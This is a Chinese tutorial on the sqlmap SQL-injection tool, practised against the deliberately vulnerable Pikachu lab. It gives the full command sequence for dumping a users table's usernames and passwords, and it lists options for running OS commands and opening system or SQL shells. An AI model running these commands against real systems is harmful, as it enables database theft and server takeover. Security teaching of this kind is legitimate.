1.sqlmap的基本功能
sqlmap的基本功能是对Web应用中的数据库进行自动化的检测、利用和攻击。
使用pikachu靶场进行sqlmap的基础功能使用。
1️⃣ 第一步:先检查是否有注入点:
# -u : 指定目标url,也就是指定注入点
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2"
2️⃣ 第二步:再使用--dbs参数获取数据库。
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dbs
# --dbs : 读取数据库
3️⃣ 第三步:查看当前应用使用的数据库。
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --current-db
# --current-db : 列出当前应用所用的数据库
4️⃣ 第四步:列出指定数据库的所有表。
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --tables -D pikachu
# --tables : 获取数据库表
# -D : 指定数据库
5️⃣ 第五步:读取指定表中的字段名称。
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --columns -T users -D pikachu
# --columns : 列取字段名
6️⃣ 第六步:读取指定字段内容。
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dump -C level,password,username -T users -D pikachu
# --dump : 为转存数据
# -C : 指定字段名称
# -T : 指定表名
# -D : 指定数据库名称。
在读取数据后,SQLMap将会把读取的数据转存到**SQLMap/output/目录下,文件以“[Table名].cvs**”保存.
通过以上步骤便完成了一个正常SQL注入并读取数据库数据的流程。
2. sqlmap参数
2.1 测试注入点权限
# 测试所有用户的权限
sqlmap -u "[URL]" --privileges
# 测试sa用户权限
sqlmap -u "[URL]" --privileges -U sa
2.2 执行Shell命令
# 执行net user命令
sqlmap -u "[URL]" --os-cmd="net user"
# 系统交互的shell
sqlmap -u "[URL]" --os-shell
2.3 获取当前数据库名称
sqlmap -u "[URL]" --current-db
2.4 执行SQL命令
# 返回sql交互的shell,执行sql语句
sqlmap -u "[URL]" --sql-shell
2.5 POST提交方式
sqlmap -u "[URL]" --data "POST参数"
2.6 显示详细的等级信息
sqlmap -u "[URL]" --dbs -v 1
# -v参数包含以下7个等级。
# 0:只显示Python的回溯、错误和关键消息;
# 1:显示信息和警告消息;
# 2:显示调试消息;
# 3:有效载荷注入;
# 4:显示HTTP请求;
# 5:显示HTTP响应头;
# 6:显示HTTP响应页面的内容。
2.7 注入HTTP请求
sqlmap -r head.txt --dbs
# head.txt中是HTTP请求的头信息
head.txt的内容大致如下:
POST /login.php HTTP/1.1
Host:www.xxx.com
User-Agent:Mozilla/5.0
username=xxx&yyy=zzz
2.8 使用SQLMap插件
sqlmap -u "[URL]" -tamper "插件名.py"
SQLMap可以使用插件,插件都保存在SQLMap目录下的tamper文件夹中,如下图所示:
关于SQLMap详细的使用可以参考官方说明:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
🌟 以上就是SQLMap的一些基础的使用说明。 🌟
